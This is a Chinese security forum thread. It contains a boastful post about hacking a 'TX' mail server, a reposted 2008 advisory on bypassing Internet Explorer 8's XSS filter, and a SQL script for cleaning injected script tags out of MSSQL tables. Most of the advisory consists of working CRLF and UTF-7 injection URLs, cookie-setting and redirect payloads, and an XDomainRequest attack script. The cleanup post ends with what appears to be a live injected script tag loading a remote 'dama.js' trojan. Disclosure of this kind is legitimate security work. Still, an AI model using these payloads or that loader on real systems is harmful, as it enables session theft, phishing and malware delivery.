最近看过此主题的会员

返回列表 发帖

dbank网盘

1

评分人数

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:漂流发表,本帖发表者漂流符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者漂流和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。
收藏 分享

提示: 作者被禁止或删除 内容自动屏蔽

TOP

回复 2# vini5


    哦,下次注意···

TOP

哈哈 支持啊 可以换头像咯哦,不过现在也蛮不错的。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

[原创]看菜鸟如何黑TX邮件服务器
做个动画娱乐下不过也是相当危险的漏洞哦!TX邮箱的漏洞,不说了操作!欢迎访问联盟论坛www.slenk.net非安全中国网欢迎您的访问!www.sitedir.com.cn我们接受安全检测如果你是高手请在测试出漏洞后告诉我们!好了开始看TX的漏洞在邮箱里哦hack by vini5 this just so funny  why this will be show the mail files we can see from the IEso   funny  that is  I am really hacked the TX mail?Oh my  God!※hack by vini5 ######################################################################### # website          : http://www.sitedir.com.cn/#            hack by vini5#  # #########################################################################看见了没有就这么简单写入文件!好了不说了慢慢研究下看看!下载地址http://www.slenk.net/attachment.php?aid=1360
本站下载: http://www.sitedir.com.cn/video/TXmail.rar


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

哈哈,站长论坛的贴子不错,是我们这些读书人来的地方,嘿嘿


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

IE8.0 Beta 2 Anti-XSS问题
Aspect9: Internet Explorer 8.0 Beta 2 Anti-XSS Filter Vulnerabilities
Release Date:December 11, 2008
Date Reported:October 5, 2008
Severity:Medium-High (Execute scripts, Turning Protection Off, Transfer data CrossDomains)
Vendor:Microsoft
Systems Affected:Windows Platform with Internet Explorer 8.0 Beta 2
Overview:Aspect9 has discovered several vulnerabilities in Microsoft WindowsInternet Explorer 8.0 Beta 2. This new version of Microsoft's famousbrowser includes new security improvements such as a Cross Site Scripting(XSS) filter. This version also includes a new object that safely allowstransferring  data across domains, allowing them to interact with each other.
The Anti-XSS filter has been found to have some security holes in thecurrent implementation. Microsoft decided to filter "Type 1 XSS" which isfree  text send to the server being reflected to the user and thereforeinjecting HTML code into the website's page. They chose not to handlecertain situations such as injection into a JavaScript tag space, whichwould be extremely difficult to filter. The software giant also chose notto filter injection into HTTP headers, which will drive hackers to focus ondiscovering CRLF vulnerabilities.
A quote of Microsoft's Anti-XSS filter design philosophy:<<<"Like all security mitigation and protection technologies, the XSS Filter'sapproach does have limitations, being that it is a pragmatic balancebetween application compatibility, security, and performance.
Some examples:* Injection into some contexts is not blocked. Ex: Scenarios where contentcan be injected directly into JavaScript without breaking out of a string.
* Injections facilitated by some HTTP headers are not currently blocked.Ex: "Referer" based injection.
* If a page contains multiple nearby injection points, attacks can beconstructed that thwart the XSS Filter.">>>
For more information about the Anti-XSS filter:http://blogs.msdn.com/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx
In order to understand the contents of this advisory, the reader must befamiliar with the concept of CRLF which is distinguished from CRSF.http://www.owasp.org/index.php/CRLF_Injectionhttp://www.owasp.org/index.php/CSRF
Technical Details:
Bypass using CRLF+Encodings:---------------------------------------------Microsoft Windows Internet Explorer 8.0 Beta 2 was designed to stop "Type 1XSS" attacks. CRLF Injection is also XSS type 1 and is not mitigated by thefilter, though the data in the query string will still be filtered.This means that if an attacker tries to exploit a CRLF for XSS in thecasual manner, used in this demo:http://www.sitedir.com.cn/crlf.py?url=cookie1%3dvalue1;%0D%0A%0D%0A<html><body><script>alert('get it?')</script></body></html>
His attack will fail as "<script>" will be filtered to "<sc#ipt>"
However, an attacker can inject a content-type header and overwrite thepage charset and therefore bypass the XSS filter which uses the priorencoding. A good example for this is with utf-7, the following request:http://www.sitedir.com.cn/crlf.py?url=cookie1%3dvalue1;%0d%0aContent-Type: text/html; charset%3dutf-7%0d%0a%0d%0a<html><body>+ADw-script+AD4-alert('owned')+ADw-/script+AD4-</body></html>
This will result in:
HTTP/1.1 200 OKContent-Type: text/html; charset=utf-7Server: Microsoft-IIS/6.0Set-Cookie: url=cooki1=value1;X-Powered-By: PleskWinMicrosoftOfficeWebServer: 5.0_PubX-Powered-By: ASP.NETDate: Sun, 05 Oct 2008 23:46:11 GMTConnection: close
<html><body>+ADw-script+AD4-alert('owned')+ADw-/script+AD4-</body></html>;Content-Type: text/html
This will be rendered as utf-7 and will execute.
Bypass using CRLF+"X-XSS-Protection":-------------------------------------------------------In addition to the problem of CRLF being able to re-write the page andbypass the filter using a different encoding than the one of the page,Microsoft were kind enough to leave a backdoor AKA feature for developersto turn the filter off. This header is called "X-XSS-Protection" which getsa Boolean value of 0 or 1. Injecting "X-XSS-Protection: 0" though CRLF anattacker can shutdown the XSS protection for the current request.
Demo:http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body><script>alert('owned')</script></body></html>
Of course the problem goes further to any HTTP header that can be usedmaliciously like setting cookies and by that changing to a different userthen the one logged on, such as stealing their cookie and then replacing itwith a cookie of a bulk user and therefore taking over their session. using"Location:" header to redirect pages and internal frames/iframes tolook-a-like phishing websites and etc...
Demos:http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aLocation:http://www.micros0ft.com%0d%0a%0d%0a
http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aSet-Cookie:sessionid%3dblablablabla_bulk_user_md5_sessionid%0d%0a%0d%0a<html><body>The server is busy, try again in 30 minutes</body></html>
CRLF+"XDomainRequestAllowed" --> XDomainRequest Enabling:---------------------------------------------------------Having a CRLF injection already gives an attacker the ability to overwritethe HTTP response BODY, which means he can create a new hiddenimage/frame/form and send data through it, data such as the domains cookie.But it is clear that overwriting the body using CRLF and making it look thesame requires a "fetcher" server side script on the same domain. Also anetwork  filter or a WAF may deny injection of double CRLF (%0d%0a%0d%0a).As time goes by and security evolves, the attacker should have a hardertime sending this information out silently.
In IE8, there is a new object called "XDomainRequest" which is designed toallow safe data exchange across domains.More information at:http://msdn.microsoft.com/en-us/library/cc288108(VS.85).aspx
The browser will only allow the client(the JavaScript code) to interactwith that website if the website returns the "XDomainRequestAllowed"Boolean header.
Using CRLF to inject XDomainRequestAllowed header an attacker can interactin a CROSS DOMAIN mode with that website without his consent, as it isbeing faked by the injected header. This attack concept on the XDomainRequestin general should be named "XAI" (XDR Allowed Injection)
This is a demo request to a CRLF vulnerable web page:http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aXDomainRequestAllowed: 1
This is how the attacker's script would look like:------------------------------------------------ <script> try {      xdr = new XDomainRequest();      xdr.onload = function() {        alert(xdr.responseText);      }      xdr.open("GET", "http://www.sitedir.com.cn/crlf.py?url=cooki1%      3dvalue1;%0d%0      aXDomainRequestAllowed: 1");      xdr.send(""); } catch (e) {    alert(e.description) } </script>------------------------------------------------The attacker can now transfer data to/from that domain other domains with just 1header injection, a new, by design weapon to replace leak data with XSS.An attacker can use the new feature to interact with web servers (i.e. send andreceive data from those domains) by pretending to have theauthorization to do so,using a single CRLF header injection.This is an ultimate vulnerability that exploits this new feature to enable easyinformation data leakage and cross domain attacks.
UTF-7 Websites are not filtered:-------------------------------------------When the page charset is set to utf-7 whether by the http header or by ameta tag, the Anti-XSS filter will not apply on this page, allowing a utf-7encoded injected html code to execute. In other words, utf-7 content sentto utf-7 encoded web pages is not filtered, therefore allowing XSS attackson utf-7 web pages.
I must admit that I have never met a website written in utf-7 for non-maliciouspurposes, but it is still a feature and there are many website thatimplement language templates and receive the charset as a parameter fromthe query string or the cookie.
Demos:http://www.sitedir.com.cn/xssurlnoparams.py/+AD4-+ADw-script+AD4-alert('see?')+ADw-/script+AD4-+ADw-div
http://www.sitedir.com.cn/xssurlnoparams.py?data=+AD4-+ADw-script+AD4-alert('see?')+ADw-/script+AD4-+ADw-div
Direct bypass using any double injection:-----------------------------------------A quote from the filter's architecture implementation:<<<"If a page contains multiple nearby injection points, attacks can beconstructed that thwart the XSS Filter.">>>Well, that is not accurate.
ANY second appearance of the injected data will allow execution of scriptcode. The concept is that data inside tags such as script and style isparsed by their own parser.
The CSS(style) parser has 2 characteristics that differentiate it from thescript parser:1) It is a silent parser (there is no indication of failure)2) It is executing as batch operations per block, which means that closingA NON EXISTING (never opened) block will cause parsing of the followingblocks. What does this mean?!?!
It means that in a quite common scenario of any text injected just twice atany position inside the HTML(except inside a textarea/script/style tags,these can also be fixed by putting </textarea> in a css comment) of thepage will cause at the first point where the code is injected to the page
} BODY{a:expression(alert('hi'))};</style>***<style>***
a style tag is opened and anything after it will be ignored by a silent cssparser error and on the second injection:
***} BODY{a:expression(alert('hi'))};</style>***<style>
a new style block will be opened, rendered and this would automaticallyexecute script code!
Demo:http://www.sitedir.com.cn/doublexss.py?username=} BODY{a:expression(alert('hi'))};</style><style>
Filter False Positives:-----------------------The following text send to a page as parameters will trigger a false-positivematch by the Anti-XSS filter:
<"script">alert('innocent code')</script><'script'>alert('innocent code')</script>"<[whatever]script>alert('innocent code')</script>
The following should trigger on most CSS design forums with a previewfeature:<style>@import</style><style>x:y(1)</style>
This means that a CSS tutorial web page cannot send to itself or to anotherpage the following raw text (whether it will be treated as text or as HTMLby the receiving page):
<style>color:rgb(1,2,3)</style>
Vendor Status:Microsoft's response regarding the CRLF issues:"We will not be lead to compromise the XSS Filter's web site compatibilityby attempting to  address every conceivable XSS attack scenario."
Microsoft's response regarding the STYLE issue:"We hope we can get a change in prior to IE8 RC1"
Microsoft's response regarding the "filter not applied in UTF-7 Websites":"Behaviour is by design"
Credit:Rafel Ivgi
Greetings:David Ross, the_pull, Arkon, JonD, lorgandon, xbxice, Budo, Reiter,Inga, Lucid, h.p.c, Dror Shalev,  Liu Die Yu, wir3less, Zull, 0fir0,dbrod, ax1les,whitehawkofjustice
DisclaimerThe information within this paper may change without notice.Use of this information constitutes acceptance for use in anAS IS condition. There are no warranties, implied or express,with regard to this information. In no event shall the authorbe liable for any direct or indirect damages whatsoeverarising out of or in connection with the use or spread ofthis information. Any use of this information is at theuser's own risk.


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

MSSQL数据库清除安全辅助工具sql语句
MSSQL数据库被插入木马批量删除sql语句,一朋友服务器被批量插入了js木马,几乎每个表的文本字段都被插入了,网上找了这个sql语句,修改了下,备用。 --删除处理 DECLARE hCForEach CURSOR GLOBAL FOR SELECT N'update '+QUOTENAME(o.name)     +N' set  '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script src=http://www.hacker.com.cn/cn.js></script>'','''')' FROM sysobjects o,syscolumns c,systypes t WHERE o.id=c.id     AND OBJECTPROPERTY(o.id,N'IsUserTable')=1     AND c.xusertype=t.xusertype     AND t.name IN('varchar','nvarchar','char','nchar','text') EXEC sp_MSforeach_Worker @command1=N'?'<script src=http://www.sitedir.com.cn/dama.js></script>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表